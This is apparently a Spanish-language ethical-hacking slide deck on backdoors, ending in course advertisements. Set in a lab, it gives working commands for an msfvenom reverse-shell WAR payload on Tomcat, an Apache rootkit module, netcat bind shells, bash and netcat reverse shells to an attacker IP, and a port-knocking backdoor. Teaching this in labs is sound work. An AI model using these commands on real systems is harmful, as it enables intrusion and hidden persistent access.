NARRACIONES SOBRE LA VIDA DEL GENERAL ELOY ALFARO
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos Básicos
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdad
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahua
 
Heinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativoHeinsohn Privacidad y Ciberseguridad para el sector educativo
Heinsohn Privacidad y Ciberseguridad para el sector educativo
 
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
Plan Refuerzo Escolar 2024 para estudiantes con necesidades de Aprendizaje en...
 
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS  Y PALABRAS ACTO 2 DE ABRIL 2024.docxGLOSAS  Y PALABRAS ACTO 2 DE ABRIL 2024.docx
GLOSAS Y PALABRAS ACTO 2 DE ABRIL 2024.docx
 

Backdoors: Tipos y Ejemplos Prácticos

  • 1.
  • 2. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  • 3. AGENDA 1. ¿Quién soy? 2. Buscando vulnerabilidades backdoors 3. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 4. Instalando y configurando backdoors (ejemplos) 5. Información sobre el curso 6. Conclusiones
  • 4. #whoami • Ing. Sistemas – ISO 27001 Lead Auditor, CISM, C|EH, C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002 • Instructor Oficial de MILE2 • Consultor de Kunak Consulting SAC http://www.kunak.com.pe • Psicólogo que aun no comienza sus estudios…. • Escritor en mis tiempos libres: http://www.el-palomo.com • Correo electrónico: • omarc320@gmail.com • opalomino@kunak.com.pe • Cuenta de Facebook: • www.facebook.com/El.Palomo.Seguridad.Informacion
  • 5. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  • 6. ¿Qué es un Backdoor (puerta trasera)? • Los backdoors son programas utilizados por los hackers para lograr acceso a sistemas operativos de manera rápida y sencilla. • Existen diferentes tipos de backdoors: • Backdoors en Aplicaciones Web • Backdoors a través de SETUID • Backdoors en Módulos de Servicios • Backdoors del tipo Knocking
  • 7. Arquitectura de los Ejemplos TARGET - Servidor TOMCAT vulnerable - Aquí se instalaran los backdoors - Sistema Operativo Linux ATACANTE - Computador desde el cual se realizarán los ataques - Sistema Operativo KALI LINUX 2 ATACANTE 2 - Computador desde el cual se explotaran los backdoors - Sistema Operativo Linux Dirección IP: 192.168.4.131 Dirección IP: 192.168.4.130 Dirección IP: 192.168.4.132
  • 8. Identificar Servicios TOMCAT • Buscamos TOMCAT en la RED LAN a través de NMAP Nmap –sV –p 8080 –sS TARGET auxiliary/scanner/portscan/syn Buscamos TOMCAT/AXIS2 en INTERNET: Google Dork: intitle:"Tomcat Server Administration“ intitle:"Axis2 Happiness Page" +ext:jsp
  • 9. Ahora si …. Vamos con los ejemplos
  • 10. Identificar Vulnerabilidades en TOMCAT • Vamos a utilizar METASPLOIT para identificar vulnerabilidades: Root> msfconsole Root> search tomcat Root> use auxiliary/scanner/http/tomcat_mgr_login Root> show options Root> set RHOSTS 192.168.4.130 Finalmente realizar la carga de un .WAR malicioso para obtener acceso al sistema operativo. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.4.131 -f war > meterpreter.war En el cliente: Msf> use exploit/multi/handler Msf> set payload java/meterpreter/reverse_tcp
  • 11. Backdoor con SETUID • De pronto algunos nunca escucharon de los permisos GETUID, SETUID y STICKY. Pues este mecanismo de backdoor está asociado a SETUID. ¿Entonces en que consiste el SETUID? El SETUID es un bit que permite a las aplicaciones ejecutarse con los permisos de su propietario. El concepto puede sonar muy abstracto pero si ponemos un ejemplo es más facil entender, vamos a crear un archivo llamado TEST.C y lo compilamos.
  • 13. Backdoor en Apache Server • Cargamos un módulo en APACHE de tal manera que no se realicen cambios a nivel de código en los aplicativos PHP. • ¿Cuántos administradores de Sistemas verifican los módulos cargados en Apache? • Toca compilar un módulo de APACHE llamado ModROOTme. https://github.com/jingchunzhang/backdoor_rootkit/ tree/master/mod_rootme-0.4
  • 14. Backdoor en Apache Server • Comandos en el Sistema Operativo root>cd mod_rootme-0.4/ root>Make Linux root> cp mod_rootme2.so /etc/httpd/modules root> /etc/init.d/httpd reload En el cliente: Root> nc 192.168.4.130 80 GET root
  • 15. Backdoor: BindShell • Las primeras herramientas utilizados por Hackers fue la navaja suiza “NETCAT”. • Una BindShell es un programa corriendo una SHELL dentro de un proceso de red. • Una BindShell puede estar escrita en cualquier lenguaje de programación. http://netcat.sourceforge.net/download.php
  • 16. Backdoor: Bind Shell • Comandos en el sistema operativo: root>./configure --enable- DGAPING_SECURITY_HOLE root>Make root> cd src/ root> ./netcat -l -p 8443 -e /bin/sh root> bg En el CLIENTE: C:>nc64.exe 192.168.75.133 8443
  • 17. Backdoor: Reverse Shell • Tiene el mismo concepto que una Bind Shell pero realizada de manera reversa. • Ahora es el servidor quien se conecta a nuestro cliente. Esta pensado para poder realizar bypass de Firewalls.
  • 18. Backdoor: Reverse Shell • Reverse Shell con BASH En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: bash -i >& /dev/tcp/192.168.1.34/8080 0>&1
  • 19. Backdoor: Reverse Shell • Reverse Shell con NETCAT En el cliente: nc64.exe -l -p 8080 -vvv En el servidor: ./netcat -e /bin/sh 192.168.1.34 8080
  • 20. Backdoor: KnockOut • Knock viene del ingles tocar la puerta. • Este es un backdoor del tipo “Reverse Shell” que pasa desapercibido. • Sólo puede ser accedido por aquel que conozca la combinación de la “puerta” correcta.
  • 21. Backdoor: KnockOut • En el servidor: • Root> $make servidor • Root> ./knock-outd knock-out.conf eth5 • En el cliente (atacante): • Root> $make cliente • Root> ./knock-outc 192.168.4.130 knock-out.conf • Root> ./netcat -lv -p 64876
  • 22. AGENDA 1. ¿Quién soy? 2. ¿Qué es un backdoor? 1. Backdoor SETUID 2. Backdoor Módulo de APACHE 3. Backdoor Bind Shell 4. Backdoor Reverse Shell 5. Backdoor KnockOut 3. Instalando y configurando backdoors (ejemplos) 4. Información sobre el curso 5. Conclusiones
  • 23. Curso de Ethical Hacking https://www.facebook.com/sistemasuni/ Lugar: Universidad Nacional de Ingeniería (UNI) – Lima – Perú Duración: 24 horas – Curso Básico 24 horas – Curso Avanzado Certificado: A nombre de la Universidad Nacional de Ingeniería (UNI) Próximo Inicio: Inicios Recurrentes
  • 24. Curso de Seguridad de Información http://www.kunak.com.pe Lugar: Miraflores – Lima – Perú Duración: 60 horas Certificado: A nombre Kunak Consulting SAC Próximo Inicio: Por definir